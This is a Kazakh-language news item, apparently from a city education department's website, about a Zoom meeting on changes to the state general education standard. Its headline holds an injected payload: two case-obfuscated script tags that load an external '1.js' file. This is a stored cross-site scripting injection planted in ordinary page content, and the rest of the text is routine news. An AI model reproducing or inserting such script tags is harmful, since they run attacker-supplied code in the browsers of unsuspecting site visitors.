Білім берудің мемлекеттік жалпыға міндетті стандартының жобасы бойынша кеңес<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.11.2024

2024 жылғы 25 қарашада Қосшы қаласының білім бөлімінің  мектепке дейінгі білім беру әдіскері Г.К. Мейрманова және білім бөлімінің әдістемелік кабинетінің меңгерушісі Т.Т.Алшынбаева мемлекеттік жалпы білім беру стандартының жаңалықтарын түсіндіру бойынша ZOOM кеңесін ұйымдастырды. ZOOM кеңесіне бөбекжай меңгерушісі және педагогтар қатысты.

Өзгерістер келесі аспектілерді қамтиды:

* Білім беру құндылықтары мен негізгі құзыреттерді нақтылау.

* Білім берудің әртүрлі деңгейлеріндегі мақсаттар мен міндеттерді үйлестіру.

* Мемлекеттік жалпы білім беру стандарты шеңберінде терминологияны нақтылау және жаңа терминдерді енгізу.

* Мемлекеттік жалпы білім беру стандартын қолдану салаларын кеңейту.

* Бастауыш және жоғары мектепте оқу жүктемесін төмендету жоспарлануда.

* Орта мектепте оқу жоспарының вариативтік бөлігіндегі сайлауды кеңейту есебінен профильдеу күшейтіледі.

* Академиялық адалдықты және оны сақтауды оқыту талабы, сондай-ақ басқа да өзгерістер енгізіледі.

Қазіргі қолданыстағы стандарт пен жаңадан өзгеріс енгізілетін стандарттың айырмашылықтарын салыстырып, негізгі аспектілеріне тоқталып өтті.

 

Просмотров: 1101


Пікір қосу



Деректерді қолтаңбаға қосу